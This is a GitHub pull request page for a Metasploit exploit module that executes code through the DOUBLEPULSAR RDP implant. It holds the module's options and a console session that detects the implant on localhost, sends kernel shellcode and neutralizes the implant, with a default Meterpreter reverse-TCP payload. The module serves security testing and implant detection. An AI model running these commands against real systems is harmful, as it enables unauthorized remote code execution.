Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add RDP DOUBLEPULSAR command and control module #12903

Merged
merged 17 commits into from Feb 3, 2020

Conversation

@wvu-r7
Copy link
Member

wvu-r7 commented Feb 3, 2020

Future to-do: update kernel shellcode mixin to incorporate the various shellcode we've acquired.

msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > info

       Name: RDP DOUBLEPULSAR Remote Code Execution
     Module: exploit/windows/rdp/rdp_doublepulsar_rce
   Platform: Windows
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2017-04-14

Provided by:
  Equation Group
  Shadow Brokers
  Luke Jennings
  wvu <wvu@metasploit.com>
  Tom Sellers
  Spencer McIntyre

Module stability:
 crash-os-down

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Execute payload (x64)
  1   Neutralize implant

Check supported:
  Yes

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
  RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
  RDP_DOMAIN                        no        The client domain name to report during connect
  RDP_USER                          no        The username to report during connect, UNSET = random
  RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT            3389             yes       The target port (TCP)

Payload information:
  Space: 3316

Description:
  This module executes a Metasploit payload against the Equation
  Group's DOUBLEPULSAR implant for RDP. While this module primarily
  performs code execution against the implant, the "Neutralize
  implant" target allows you to disable the implant.

References:
  https://github.com/countercept/doublepulsar-detection-script

Also known as:
  DOUBLEPULSAR

Related modules:
  exploit/windows/smb/smb_doublepulsar_rce

msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >

#12374

wvu-r7 added 17 commits Nov 13, 2019
vprint_good should be print_warning, and most vprints should be print,
even if in check, since check is critical functionality.
Thanks to @tsellers-r7 for testing XP and producing output to compare
against. Without a 32-bit test, the architecture guess was incorrect.
Additionally, product type had yet to be determined. The trailing bytes
were indeed significant! Thanks, Tom!
Found the struct that corresponds to the ping response!
@smcintyre-r7

This comment has been minimized.

Copy link
Member

smcintyre-r7 commented Feb 3, 2020

Tested successfully, appears to be working as intended. I'll have this landed momentarily.

msf5 > use exploit/windows/rdp/rdp_doublepulsar_rce 
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > show options 

Module options (exploit/windows/rdp/rdp_doublepulsar_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            3389             yes       The target port (TCP)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Execute payload (x64)


msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check

[*] 127.0.0.1:3389 - Sending ping to DOUBLEPULSAR
[!] 127.0.0.1:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 127.0.0.1:3389 - Target is Windows Server 6.1.7601 SP1 x64
[+] 127.0.0.1:3389 - The target is vulnerable.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set PAYLOAD windows/x64/messagebox
PAYLOAD => windows/x64/messagebox
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > exploit

[-] 127.0.0.1:3389 - Exploit aborted due to failure: bad-config: 

Are you SURE you want to execute code against a nation-state implant?
You MAY contaminate forensic evidence if there is an investigation.

Disable the DefangedMode option if you have authorization to proceed.

[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set DefangedMode false
DefangedMode => false
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > exploit

[*] 127.0.0.1:3389 - Sending ping to DOUBLEPULSAR
[!] 127.0.0.1:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 127.0.0.1:3389 - Target is Windows Server 6.1.7601 SP1 x64
[*] 127.0.0.1:3389 - Generating kernel shellcode with windows/x64/messagebox
[*] 127.0.0.1:3389 - Sending shellcode to DOUBLEPULSAR
[+] 127.0.0.1:3389 - Payload execution successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Execute payload (x64)
   1   Neutralize implant


msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set TARGET 1
TARGET => 1
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] 127.0.0.1:3389 - Sending ping to DOUBLEPULSAR
[!] 127.0.0.1:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 127.0.0.1:3389 - Target is Windows Server 6.1.7601 SP1 x64
[*] 127.0.0.1:3389 - Neutralizing DOUBLEPULSAR
[+] 127.0.0.1:3389 - Implant neutralization successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check

[*] 127.0.0.1:3389 - Sending ping to DOUBLEPULSAR
[-] 127.0.0.1:3389 - DOUBLEPULSAR not detected or disabled
[*] 127.0.0.1:3389 - The target is not exploitable.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > 
zeroSteiner pushed a commit that referenced this pull request Feb 3, 2020
@zeroSteiner zeroSteiner merged commit 7175126 into rapid7:master Feb 3, 2020
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@smcintyre-r7

This comment has been minimized.

Copy link
Member

smcintyre-r7 commented Feb 3, 2020

Release Notes

This adds an exploit module to leverage the RDP variant of the DOUBLEPULSAR implant from the Fuzzbunch framework. The module is capable of both detecting and neutralizing implants as well as executing code.

@wvu-r7 wvu-r7 deleted the wvu-r7:feature/doublepulsar branch Feb 3, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants
You can’t perform that action at this time.